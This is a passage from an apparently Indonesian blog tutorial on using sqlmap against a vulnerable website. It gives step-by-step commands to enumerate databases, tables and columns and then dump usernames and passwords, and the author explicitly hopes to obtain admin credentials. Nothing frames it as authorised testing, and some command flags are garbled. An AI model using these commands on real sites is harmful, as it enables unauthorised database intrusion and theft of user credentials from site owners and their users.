banyak kok di google kawan anggreks"2.buat yang belum punya program python monggo silahkan download download yang 2.3.7
3.Kalo udah selsai , download SQLMAP python nya. lalu simpan di direktori PC teman "Bebas mau di taruh dimana aja D/C "
4.Buka dan tujulah ke direktori penyimpanan anda tadi "Contoh"
perintah tuju direktori dengan CMD :
d: <<< untuk menuju data d
c: <<< untuk menuju data c
cd : menggali lebih dalam direktori.Misal nya saya, menyimpan di D:\Data-gw\Penetrasi\sqlmap . makanya saya harus menggali nya dengan perintah cd "sebagai contoh : cd data-gw ENTER, cd penetrasi ENTER , cd sqlmap ENTER.
Lihat gambar berikut ini
:![[Image: TujuDirektoridenganCmd.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbV8XJuZsIiZD2Qs4RknXdvktWjsiiOehyphenhyphenL1GGfgt1qfciafwIS7-9020lHpScXonYHTncrGEfAOUqVMFDodnaYksDWow-vYq4yvf-RioSn2w4n1jx3gNoGjsWzFeKC1t2g2jDs3TexMY/s1600/TujuDirektoridenganCmd.png)
Mudahkan
... 5.Nah kalo sudah di tuju direktori nya,Silahkan masukan syntax berikut ini : sqlmap.py -u SiteVuln --dbs ENTER (Untuk mencari database) "Maka akan jadi seperti gambar di bawah ini"
Mohon maaf , kalo gambar nya BWK :
![[Image: MencariDbs.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCtZfWeSD0M00Agn86rYjcAwHhxlEvG-8YdHpHMRYscwQGkwjT1DjospIJVRbcjS73A2xd4P5LXsASRN9p7SRSGfQANsd3ysyeWyASII2un52v31chqp8iY9Jp7w94QT0oPdFBhLlWzL8/s1600/MencariDbs.png)
6.Sekarang kita menggali tabel dari Dbs , " BUG " , masukan perintah : sqlmap.py -u SiteVuln --d database nya --tables
ENTER , Nah Munculkan banyak kan tuh
, table dari Database nyauntuk lebih jelasnya Lihat gambar di bawah ini :
![[Image: EksekusiUser.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXiGB_bAhvv1e36OkZ7DInf3Iqiih7yztJNQfh2Ij99NEt5pyXgq9mDsXa9fvMDgQ9sfnJZKhYs8K7d6nuDXVEtpMnOCbIS8-8yQsZzJUjzRBYkRNNtCL998boc3gkQF_znIckHJzEWqQ/s1600/EksekusiUser.png)
7.Selanjut nya adalah, menemukan kolom nya.Silahkan masukan sintaks nya lagi :
sqlmap.py -u SiteVuln -D DataBase nya -D tabel nya --columns ,, Oke kalo udah Enter lagi , dan lihat hasil nya :
![[Image: udah%2Bmenemukanuser%252Bpassadmin.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_8AxcO4cK5sO4qaqWcnyFp0dIP5JNi7Q6Pgz_kVlGgm6Ntf_uG0r6nkOrrbfPmMKos-9dLezhQiDLwPmgFwtmVv6eqff5Y3HbPnh3lI5PurX0gxHBaPj8oM-dlz8bHo__XlfOgOx_uag/s1600/udah+menemukanuser%252Bpassadmin.png)
Ea kk , jangan berbahagia dulu
soalnya kita kan gaktau username + password siapa yang kita dapet "syukur2x kalo si admin yang kita dapet" kalo user biasa gimana 
Biar gak penasaran , lanjut ke step berikut nya 8.Melihat isi dari kolom tersebut
Seperti biasa masukan sintaks lagi, sintakz nya adalah :sqlmap.py -u SiteVuln -D Nama databasenya -T Nama tablenya -C nama kolomnya --dump
Sebagai contoh gambar di atas , saya akan mengambil username nya password nya belakangan
. Setelah kita mendapatkan username nya, lakukan hal yang sama untuk mendapatkan password dengan sintaks di atas. maka akan seperti ini jadi nya "contoh gambar" :![[Image: Berhasil%2Bmendapatkan%2Busername%252Bpa...Badmin.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5ad_mntm2ib61Wala7q8KDkaVw3LA8i0iDfT4vIlA_2FCU_HxQT01ew3q0Yie14f4FnDBKAd6jwo23eVU6G0Do4DX1zH1qt8VAvaxUHLUqfO8yFkGR-fNqpYIeUfUzVQikmKdafn905w/s1600/Berhasil+mendapatkan+username%252Bpassword+admin.png)
SUMBER
0 comments:
Post a Comment